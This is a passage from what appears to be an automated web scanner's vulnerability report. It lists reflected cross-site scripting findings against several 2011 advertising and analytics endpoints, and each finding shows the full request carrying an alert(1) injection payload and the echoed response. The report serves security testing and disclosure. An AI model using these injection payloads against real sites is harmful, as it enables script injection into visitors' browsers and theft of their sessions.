Referer: http://view.atdmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:40 GMT
Date: Mon, 09 May 2011 16:03:40 GMT
Connection: close
Content-Length: 1271

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3581b4<script>alert(1)</script>629a79ccfc5", c2:"6036066", c3:"KELL-CRN-003-01-CHI", c4:"214084026", c5:"319082770", c6:"", c10:"", c15:"", c16:"", r:""});


2.54. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 9badc<script>alert(1)</script>e184f9a114f was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=9badc<script>alert(1)</script>e184f9a114f&tm=907060 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:44 GMT
Date: Mon, 09 May 2011 16:03:44 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"9badc<script>alert(1)</script>e184f9a114f", c16:"", r:""});


2.55. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload a4098<script>alert(1)</script>ae08c3db88e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036066a4098<script>alert(1)</script>ae08c3db88e&c3=KELL-CRN-003-01-CHI&c4=214084026&c5=319082770&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:41 GMT
Date: Mon, 09 May 2011 16:03:41 GMT
Connection: close
Content-Length: 1271

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036066a4098<script>alert(1)</script>ae08c3db88e", c3:"KELL-CRN-003-01-CHI", c4:"214084026", c5:"319082770", c6:"", c10:"", c15:"", c16:"", r:""});


2.56. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 18502<script>alert(1)</script>580a4143ba0 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036066&c3=KELL-CRN-003-01-CHI18502<script>alert(1)</script>580a4143ba0&c4=214084026&c5=319082770&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:41 GMT
Date: Mon, 09 May 2011 16:03:41 GMT
Connection: close
Content-Length: 1271

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036066", c3:"KELL-CRN-003-01-CHI18502<script>alert(1)</script>580a4143ba0", c4:"214084026", c5:"319082770", c6:"", c10:"", c15:"", c16:"", r:""});


2.57. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 69d0a<script>alert(1)</script>a71b67a8cd4 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036066&c3=KELL-CRN-003-01-CHI&c4=21408402669d0a<script>alert(1)</script>a71b67a8cd4&c5=319082770&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:41 GMT
Date: Mon, 09 May 2011 16:03:41 GMT
Connection: close
Content-Length: 1271

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036066", c3:"KELL-CRN-003-01-CHI", c4:"21408402669d0a<script>alert(1)</script>a71b67a8cd4", c5:"319082770", c6:"", c10:"", c15:"", c16:"", r:""});


2.58. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 586b1<script>alert(1)</script>1ccd1613300 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036066&c3=KELL-CRN-003-01-CHI&c4=214084026&c5=319082770586b1<script>alert(1)</script>1ccd1613300&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:41 GMT
Date: Mon, 09 May 2011 16:03:41 GMT
Connection: close
Content-Length: 1271

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036066", c3:"KELL-CRN-003-01-CHI", c4:"214084026", c5:"319082770586b1<script>alert(1)</script>1ccd1613300", c6:"", c10:"", c15:"", c16:"", r:""});


2.59. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload c834e<script>alert(1)</script>d39317618e1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036066&c3=KELL-CRN-003-01-CHI&c4=214084026&c5=319082770&c6=c834e<script>alert(1)</script>d39317618e1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:03:41 GMT
Date: Mon, 09 May 2011 16:03:41 GMT
Connection: close
Content-Length: 1271

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036066", c3:"KELL-CRN-003-01-CHI", c4:"214084026", c5:"319082770", c6:"c834e<script>alert(1)</script>d39317618e1", c10:"", c15:"", c16:"", r:""});


2.60. http://cdn.w55c.net/i/0RJOffplIg_1080158746.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RJOffplIg_1080158746.html

Issue detail

The value of the btid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ef6b'%3balert(1)//0e76d32b692 was submitted in the btid parameter. This input was echoed as 8ef6b';alert(1)//0e76d32b692 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /i/0RJOffplIg_1080158746.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA8ef6b'%3balert(1)//0e76d32b692&ei=ADMELD&wp_exchange=0.80&euid=YWM1YWZlODktZGJlMy00YTk5LTljNjAtNTlmNGZiNDk1Y2I5&slotid=NDQ1NTgyNQ&fiu=MEZTWjhURzVYTQ&ciu=MFJKT2ZmcGxJZw&reqid=OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2Ix&ccw=SUFCWDMwIzAuMDQ5NzM2MTl8SUFCMTIjMC4xMTIxNTUxfElBQjE0IzAuMDQwODg3Ng&epid=QU02MTA&esid=QU0xNjM3&bp=801&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=&v=0&geo=VVN8VFh8NjIzfDc1MjA3&s=http%3A%2F%2Fwww.courier-journal.com%2Farticle%2F20110509%2Ffeatures07%2F305090030%2Fmonday-s-tv-talk-show-lineup%3Fodyssey%3Dmod%257cnewswell%257ctext%257chome%257cs&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:02:31 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Wed, 08-May-13 16:03:50 GMT
Cache-Control: no-cache, no-store
content-type: text/html
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 02 May 2011 22:39:41 GMT
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 81
pragma: no-cache
Via: 1.1 mdw061004 (MII-APC/1.6)
Content-Length: 2525

<script language="javascript" type="text/javascript">
new function() {
this.rand = Math.floor((Math.random() + "") * 1000000000000);
this.dvparams = 'ctx=948951&cmp=996492&plc=319082770&sid=761056';

...[SNIP]...
dmt.com/CHI/iview/319082770/direct;wi.728;hi.90/01/OWIxMWM5N2QtOGI4NS00YjYyLTgxYTUtZjQxOWM5NzE3M2IxfEFGTUE4YVhNR018MTMwNDk1NzAxNTYyN3w0NDU1ODI1fDBGU1o4VEc1WE18MFJKT2ZmcGxJZ3xFWF8xMjU2ODExODc1fDgwMTAxMA8ef6b';alert(1)//0e76d32b692?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
...[SNIP]...
2.61. http://content.pulse360.com/cgi-bin/context.cgi [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9151'%3balert(1)//d856beecd2e was submitted in the id parameter. This input was echoed as b9151';alert(1)//d856beecd2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/context.cgi?id=91041742b9151'%3balert(1)//d856beecd2e&ganid=courier-journal&gans=life&ganss=television&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vi_1.021=130494962020315081000000106057056; fc_1.2=AXTzx00

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:03:39 GMT
Server: Barista/1.1-(eangbi)
Connection: Close
Content-Length: 3465
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...
<a target="_Blank" href="https://ads.pulse360.com/advertisers.html?refid=91041742b9151';alert(1)//d856beecd2e" style="color: inherit; text-decoration: inherit;" >
...[SNIP]...
2.62. http://courier-journal.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://courier-journal.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 90a33%3balert(1)//ce6ebe43456 was submitted in the jscallback parameter. This input was echoed as 90a33;alert(1)//ce6ebe43456 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110509160347&adid=0%2C0%2C848150%2C0%2C0&cc=us&di=32450713%2C22896618%2C32421681%2C6371008%2C22751926&hk=1&ipid=10323&mh=5df8b1e5a4074f05fec4903c8d524558&pid=2%2C8%2C2%2C8%2C8&pvm=11ff088049a7507413a6131b3304dff0&pvu=C70EB3C2E91B40FDB6F9E4B08261986D&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0&kp=245%2C816%3B600%2C993%3B389%2C1218%3B613%2C1619%3B1465%2C2576%3B&prf=ll%3A450%7Cintl%3A3077%7Cpreprochrome%3A5%7Cgetconchrome%3A293%7Cadvint%3A3426%7Cadvl%3A3426%7Ctl%3A5811&jscallback=$iTXT.js.callback190a33%3balert(1)//ce6ebe43456 HTTP/1.1
Host: courier-journal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR="AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1X/pTgA-"

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1X/pTgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Fri, 08-Jul-2011 16:04:42 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Mon, 09 May 2011 16:04:42 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback190a33;alert(1)//ce6ebe43456();}catch(e){}
2.63. http://courier-journal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://courier-journal.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29370'-alert(1)-'92fd6a1d6eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=10323&29370'-alert(1)-'92fd6a1d6eb=1 HTTP/1.1
Host: courier-journal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwIAAAEv1X7mIwA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1YBF2wA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:04:04 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1YBF2wA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:04:04 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:04 GMT
Age: 0
Connection: keep-alive
Content-Length: 11740

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
l,ask,live,bing",
'ids.aol':"10",
'fields.aol':"query,as_q,q",
'fields.ask':"q",
'fields.google':"q,as_q"};
$iTXT.js.serverUrl='http://courier-journal.us.intellitxt.com';$iTXT.js.pageQuery='ipid=10323&29370'-alert(1)-'92fd6a1d6eb=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}
2.64. http://courier-journal.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://courier-journal.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 952ab%3balert(1)//326c748cb10 was submitted in the jscallback parameter. This input was echoed as 952ab;alert(1)//326c748cb10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1304957022412&pagecl=32105&fv=10&muid=&refurl=http%3A%2F%2Fwww.courier-journal.com%2Farticle%2F20110509%2FFEATURES07%2F305090030%2FMonday-s-TV-Talk-Show-Lineup%3Fodyssey%3Dmod%257Cnewswell%257Ctext%257CHome%257Cs&ipid=10323&jscallback=$iTXT.js.callback0952ab%3balert(1)//326c748cb10 HTTP/1.1
Host: courier-journal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR="AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1X/pTgA-"

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
